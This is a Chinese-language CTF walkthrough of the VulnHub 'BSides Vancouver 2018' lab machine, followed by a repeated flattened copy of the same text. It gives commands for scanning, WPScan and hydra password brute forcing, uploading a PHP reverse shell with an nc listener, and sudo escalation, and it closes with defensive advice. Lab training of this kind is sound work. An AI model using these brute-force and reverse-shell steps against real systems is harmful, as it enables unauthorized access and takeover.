VulnHub-BSides Vancouver: 2018 (Workshop)-靶机渗透学习
字数 1243 2025-08-15 21:33:30

BSides Vancouver 2018 Workshop 靶机渗透教学文档

靶机概述

  • 靶机名称: BSides Vancouver: 2018 (Workshop)
  • 难度等级: 中级(CTF)
  • 发布日期: 2018年3月21日
  • 目标: 获取root权限并找到flag.txt
  • 环境要求:
    • 能够运行两个虚拟机
    • 至少20GB可用空间
    • 预装VirtualBox
    • Kali Linux虚拟机
    • 熟悉命令行界面(CLI)

渗透测试步骤详解

1. 信息收集

1.1 网络扫描

使用nmap进行初始扫描,发现开放端口:

nmap -sV -T4 <靶机IP>

发现开放服务:

  • 21/tcp - FTP (允许匿名登录)
  • 22/tcp - SSH
  • 80/tcp - HTTP

1.2 FTP服务探查

匿名登录FTP服务:

ftp <靶机IP>
用户名: anonymous
密码: (任意或留空)

下载关键文件:

get users.txt.bk

users.txt.bk内容为潜在用户名列表,可用于后续爆破。

2. Web服务分析

2.1 HTTP服务枚举

访问80端口web服务,检查robots.txt文件:

http://<靶机IP>/robots.txt

发现敏感目录:

/backup_wordpress/

2.2 目录爆破

使用gobuster进行目录枚举:

gobuster dir -u http://<靶机IP>/backup_wordpress/ -t30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,301,302

发现关键目录:

  • /wp-admin/ (WordPress管理后台)
  • /wp-content/uploads/ (上传目录)

3. WordPress漏洞利用

3.1 用户枚举

使用WPScan枚举WordPress用户:

wpscan --url http://<靶机IP>/backup_wordpress/ --enumerate u

3.2 密码爆破

使用WPScan进行密码爆破:

wpscan --url http://<靶机IP>/backup_wordpress/ --api-token 'API' -U wordpressusers.txt -P /usr/share/wordlists/rockyou.txt

成功获取凭据:

  • 用户名: john
  • 密码: enigma

3.3 获取Web Shell

  1. 登录WordPress后台
  2. 通过媒体上传功能上传PHP反弹shell文件
  3. 访问上传的shell文件路径获取反向连接

4. 权限提升

4.1 初始访问

在Kali上设置监听:

nc -lvnp 1234

访问上传的PHP shell触发反向连接。

4.2 用户枚举

检查系统用户:

ls /home

发现多个用户,其中anne用户可被利用。

4.3 SSH密码爆破

使用hydra爆破SSH密码:

hydra -l anne -P /usr/share/wordlists/rockyou.txt -t 4 ssh://<靶机IP>

成功获取凭据:

  • 用户名: anne
  • 密码: princess

4.4 特权提升

通过SSH登录后检查sudo权限:

sudo -l

发现anne用户具有完整sudo权限,直接提权:

sudo su

关键工具与技术总结

  1. nmap: 网络扫描和端口服务识别
  2. FTP匿名登录: 获取初始信息
  3. gobuster: Web目录爆破
  4. WPScan: WordPress漏洞扫描和用户枚举
  5. hydra: SSH密码爆破
  6. sudo权限滥用: 最终特权提升

防御建议

  1. 禁用FTP匿名登录
  2. 加强WordPress安全措施:
    • 使用强密码
    • 限制登录尝试
    • 及时更新插件和主题
  3. 限制sudo权限
  4. 监控文件上传功能
  5. 实施SSH安全措施:
    • 禁用密码认证,使用密钥
    • 限制登录尝试
    • 使用fail2ban

扩展思考

该靶机可能存在其他攻击路径:

  • WordPress插件漏洞利用
  • 内核漏洞提权
  • 服务配置错误利用
  • 数据库凭证泄露

建议尝试多种方法获取root权限,以全面理解系统脆弱性。

BSides Vancouver 2018 Workshop 靶机渗透教学文档 靶机概述 靶机名称 : BSides Vancouver: 2018 (Workshop) 难度等级 : 中级(CTF) 发布日期 : 2018年3月21日 目标 : 获取root权限并找到flag.txt 环境要求 : 能够运行两个虚拟机 至少20GB可用空间 预装VirtualBox Kali Linux虚拟机 熟悉命令行界面(CLI) 渗透测试步骤详解 1. 信息收集 1.1 网络扫描 使用nmap进行初始扫描,发现开放端口: 发现开放服务: 21/tcp - FTP (允许匿名登录) 22/tcp - SSH 80/tcp - HTTP 1.2 FTP服务探查 匿名登录FTP服务: 下载关键文件: users.txt.bk 内容为潜在用户名列表,可用于后续爆破。 2. Web服务分析 2.1 HTTP服务枚举 访问80端口web服务,检查robots.txt文件: 发现敏感目录: 2.2 目录爆破 使用gobuster进行目录枚举: 发现关键目录: /wp-admin/ (WordPress管理后台) /wp-content/uploads/ (上传目录) 3. WordPress漏洞利用 3.1 用户枚举 使用WPScan枚举WordPress用户: 3.2 密码爆破 使用WPScan进行密码爆破: 成功获取凭据: 用户名: john 密码: enigma 3.3 获取Web Shell 登录WordPress后台 通过媒体上传功能上传PHP反弹shell文件 访问上传的shell文件路径获取反向连接 4. 权限提升 4.1 初始访问 在Kali上设置监听: 访问上传的PHP shell触发反向连接。 4.2 用户枚举 检查系统用户: 发现多个用户,其中 anne 用户可被利用。 4.3 SSH密码爆破 使用hydra爆破SSH密码: 成功获取凭据: 用户名: anne 密码: princess 4.4 特权提升 通过SSH登录后检查sudo权限: 发现 anne 用户具有完整sudo权限,直接提权: 关键工具与技术总结 nmap : 网络扫描和端口服务识别 FTP匿名登录 : 获取初始信息 gobuster : Web目录爆破 WPScan : WordPress漏洞扫描和用户枚举 hydra : SSH密码爆破 sudo权限滥用 : 最终特权提升 防御建议 禁用FTP匿名登录 加强WordPress安全措施: 使用强密码 限制登录尝试 及时更新插件和主题 限制sudo权限 监控文件上传功能 实施SSH安全措施: 禁用密码认证,使用密钥 限制登录尝试 使用fail2ban 扩展思考 该靶机可能存在其他攻击路径: WordPress插件漏洞利用 内核漏洞提权 服务配置错误利用 数据库凭证泄露 建议尝试多种方法获取root权限,以全面理解系统脆弱性。